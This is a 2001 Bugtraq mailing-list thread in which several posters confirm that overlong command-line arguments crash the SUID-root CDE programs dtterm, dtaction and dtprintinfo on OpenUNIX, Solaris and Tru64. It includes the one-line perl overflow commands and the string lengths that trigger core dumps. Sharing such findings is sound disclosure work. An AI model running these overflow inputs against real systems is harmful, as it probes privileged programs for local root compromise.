This also works for the following on Tru64 5.1; $ /usr/dt/bin/dtaction `perl -e 'print "A"x8203'` Memory fault(coredump) $ /usr/dt/bin/dtprintinfo -session `perl -e 'print "A"x8203'` Memory fault(coredump) All of these; dtterm, dtaction and dtprintinfo are SUID root by default. --- Bob Dog <bobdog@drunk.co.nz> > wrote: >I could reproduce this on True64 5.1 on an AlphaStation >but I had to go all the way to 8203. Using values >below 4590 caused no problems. Starting at values >of 4590 up to 8202 a dtterm window will open normally >and everything seems normal but the 'clear' command >will cause a coredump. However, the teminal window will >still remain active. Other commands don't seem to cause >problems. > >$ uname -a >OSF1 red5 V5.1 732 alpha >$ /usr/dt/bin/dtterm -tn `perl -e 'print "A"x8203'` >Memory fault(coredump) > >Bob > > >--- "Cushing, David" <David.Cushing@hitachisoftware.com> >> wrote: >>I was able to reproduce this on a Solaris 8 sparc machine with different >>tolerances: >> >>[288] uname -a >>SunOS hostname 5.8 Generic_108528-08 sun4u sparc SUNW,Ultra-60 >>[289] /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1083'` >>Segmentation Fault(coredump) >>[297] /usr/dt/bin/dtterm -tn `perl -e 'print "A"x2083'` >>Bus Error(coredump) >>ginger:dcushing[298]=20 >> >>-David >> >>> -----Original Message----- >>> From: Aycan Irican [mailto:aycan@mars.prosoft.com.tr] >>> Sent: Tuesday, October 02, 2001 1:55 AM >>> To: bugtraq@securityfocus.com >>> Cc: evrim@envy.com.tr >>> Subject: OpenUNIX 8 & Unixware possible local root >>>=20 >>>=20 >>> -----BEGIN PGP SIGNED MESSAGE----- >>> Hash: SHA1 >>>=20 >>> Another dt series bug... >>>=20 >>> $ uname -a=20 >>> OpenUNIX zen 5 8.0.0 i386 x86at Caldera UNIX_SVR5=20 >>> $ id=20 >>> uid=3D101(fixxxer) gid=3D1(other)=20 >>> $ ls -al /usr/dt/bin/dtterm=20 >>> - -r-sr-xr-x 1 root bin 60892 Haz 10 05:03=20 >>> /usr/dt/bin/dtterm=20 >>> $ /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1040'`=20 >>> Warning: Missing charsets in String to FontSet conversion=20 >>> Warning: Missing charsets in String to FontSet conversion=20 >>> Memory fault=20 >>> .. snip ..=20 > >_____________________________________________________________ >Visit these sites today >Blink 182 Fan Site - www.blink182.co.nz >NZ Skateboarding - www.nzskate.com _____________________________________________________________ Visit these sites today Blink 182 Fan Site - www.blink182.co.nz NZ Skateboarding - www.nzskate.com
